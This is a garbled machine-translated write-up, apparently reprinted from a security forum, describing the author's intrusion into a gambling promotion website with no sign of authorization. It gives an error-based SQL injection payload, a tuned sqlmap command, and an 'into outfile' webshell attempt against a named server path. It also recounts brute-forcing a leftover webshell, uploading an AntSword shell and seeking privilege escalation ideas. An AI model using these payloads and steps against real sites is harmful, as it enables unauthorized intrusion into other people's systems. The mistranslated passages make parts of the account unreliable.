Title: Record a BC promotion penetration practice

0x00  Information Collect

A friend gave me a website, which is considered a relatively large BC. I looked at the main website and there was no entrance, so I changed to one of his promotion platforms.

Then first scan the directory roughly, hoping to see some useful things. At this time, I can recommend an interface for you to quickly and roughly see its important files https://scan.top15.cn/web/infoleak, for example, whether the source code of the website is packaged. It is obvious that I did not scan it out and then show you the scanning results.

config.inc.php, according to experience, should be a configuration file of the database, but the size is 0B. I will tentatively access it. As expected, there is no upload access to it, which is 403. However, based on experience, I will still scan it again. Maybe it is a fck editor. Unfortunately, I didn’t scan anything. /index.php/login/, the size is only 2kb, it is not a background at all, and it is a bit disappointing. There is only one web asset for the port, so I can only take a look at its website functions. Then I clicked on the query and hoped to find the injection here.

0x01  Backend Injection

Sure enough, there is injection, and the rest is to look for the backend.

View the current database, and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-

Here I will remember to step on the pit, account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--('This is the complete payload. At the beginning, my payload was account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+.

tm never produces data, I thought there was a fucking filter.

And fuzzing one by one.

After thinking about whether the comment will be closed and the comment will be added'). Sure enough, the data will be released after closing.

Then I used SQLmap to run data, but I didn't expect that the tm could not run out.

Only by reconstructing the sqlmap statement by yourself python2 sqlmap.py -r 1.txt --prefix '')' --suffix '--('' --level 3 --tamper=space2plus --skip-urlencode finally ran out.

I looked at the payload later. Every time I ran, the spaces would be compiled to 20%. After the url is encoded, the payload will not take effect, so I used the skip-urlencode parameter.

0x02  Injection Point

The surprise came again. I looked at the priv and it was true that so many mysql injections finally had a relatively high permission.

I didn't even read the account and password directly. I just reported an error except for the absolute path. Isn't this --os-shell? When I checked the payload, I found hws, and I felt it was not easy, brothers.

Sure enough, if you can't write it in, you can't write it in the end if you add it --hex.

That's fine, and --sql-shell.

Writing in stacking, although I know that it is likely that I can't write it in, I still have to try it out, maybe.

Penetration of tm is metaphysics.

I checked the priv, it was not null, and gave me a little hope. Write it, write a txt first to see.

select 1 into outfile 'D:/wwwroot/wnshd.com_22fqiz/web/1.txt'

Then I went to the website to read it and didn't write it in, it was really difficult.

All Is left is --file-write, this one is not sticking to the map, and it still has not been taken down.

Helpless, I can only check the backend account password.

After collecting the account and password, I went to the backend, but unfortunately, I still couldn’t find it, and it was almost despair.

This tm has been delivered to you, but why can't I still get it? I feel that it is a problem with SQLmap. I have done the above steps again. I understand that SQLmap may lie to you, but hws doesn't. If you can't write it in, it just can't.

Forget it, let’s change the idea. Isn’t it that the directory is exploded?

wolsoowpppps, I'm going back and checking it out, nothing unexpected happens 403, wolsoowpppps/admin, wolsoowpppps/login.

There is nothing, dirsearch scanned, tm still has nothing.

0x03  Unsuccessful writing of horse

Is it not the path of web/wolsoowpppps? Could it be that I have absolutely problems with the path? I visit

It's also 403, which only means that this is a directory that has not been scanned out. Damn it, I feel like there is something here.

As a result, I scanned the picture and stopped posting it, and there was still nothing.

Ha ha ha ha.

It's a waste of joy.

But I always feel that there is something wrong with this wolsoowppps directory. I fuzzed it, fuzzing it out of the web, and then scanning the web. Oh my goodness, I temp.

php visit, a Malaysian.

Isn’t this a good thing to get so?

Then blast, and finally, successfully blast in, upload the ant key, and take it down.

This Malaysia looks very familiar.

But hws is still really powerful.

The command cannot be executed, and the plug-in and the .so method have not been found.

Thank you Brother Huang here. The guard god he mentioned is mainly asp, just send an ice scorpion horse.

Then I thought of a lot of solutions, but I can't get this permission down. I believe the boss of xz should know, let me tell you the situation.

Currently, there is only the viewing and modification permissions for disk d, and exe cannot be executed, which means that the Ms series cannot be used.

The potato clan cannot pass it on.

iis cannot be dropped in seconds.

Killing Ruan is a turquoise, a guardian, and a safe dog.

The upward cs is, but the execution of the dll and Mshta is stuck. I don’t know how to increase the power for the time being. I want to continue to expand, but I have little contact with the power for the promotion. I hope the prophet will give my cousin the idea.

0x04 Take the backend

Finally, I thought about how the Malaysians were uploaded.

The other party may also start with the injection - I found xss in one place (I also found it, but since the customer service was offline in October, I have changed the site, so my xss has not been able to fight) - Found the background - Since it is a tp3.2.3 site, the backend rce (tp3.2.3 cache getshell) - went to Malaysia.

This is the location of xss

This is the backend

Although this site has a rough price comparison, its ideas are very simple, so I should learn more.

Reprinted from the original link: https://mp.weixin.qq.com/s/qNdLNaPNK_485uAPILQXRQhttps://xz.aliyun.com/t/8491